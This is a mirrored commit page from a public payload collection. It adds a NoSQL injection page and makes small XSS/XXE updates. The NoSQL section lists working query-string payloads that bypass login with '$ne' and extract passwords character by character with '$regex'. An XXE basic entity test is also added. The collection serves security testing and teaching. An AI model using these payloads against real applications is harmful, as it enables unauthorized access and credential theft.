mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
NOSQL injection added + updates XSS/XXE
This commit is contained in:
parent
a9fe14fa29
commit
d0e164b6b1
29
NoSQL injection/README.md
Normal file
29
NoSQL injection/README.md
Normal file
@ -0,0 +1,29 @@
|
||||
# NoSQL injection
|
||||
NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic authentication bypass using not equal ($ne)
|
||||
```
|
||||
username[$ne]=toto&password[$ne]=toto
|
||||
```
|
||||
|
||||
Extract length information
|
||||
```
|
||||
username[$ne]=toto&password[$regex]=.{1}
|
||||
username[$ne]=toto&password[$regex]=.{3}
|
||||
```
|
||||
|
||||
Extract data information
|
||||
```
|
||||
username[$ne]=toto&password[$regex]=m.{2}
|
||||
username[$ne]=toto&password[$regex]=md.{1}
|
||||
username[$ne]=toto&password[$regex]=mdp
|
||||
|
||||
username[$ne]=toto&password[$regex]=m.*
|
||||
username[$ne]=toto&password[$regex]=md.*
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* https://www.dailysecurity.fr/nosql-injections-classique-blind/
|
||||
* https://www.owasp.org/index.php/Testing_for_NoSQL_injection
|
@ -242,4 +242,8 @@ Use JSFuck to encode the payload (alert())
|
||||
|
||||
## Thanks to
|
||||
* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
|
||||
* tbm
|
||||
* tbm
|
||||
* http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html
|
||||
* http://www.thespanner.co.uk/2014/03/21/rpo/
|
||||
* http://blog.innerht.ml/rpo-gadgets/
|
||||
* http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite
|
@ -3,6 +3,16 @@ An XML External Entity attack is a type of attack against an application that pa
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic Test
|
||||
```
|
||||
<!--?xml version="1.0" ?-->
|
||||
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
|
||||
<userInfo>
|
||||
<firstName>John</firstName>
|
||||
<lastName>&example;</lastName>
|
||||
</userInfo>
|
||||
```
|
||||
|
||||
Classic XXE
|
||||
```
|
||||
<?xml version="1.0"?>
|
||||
|
Loading…
Reference in New Issue
Block a user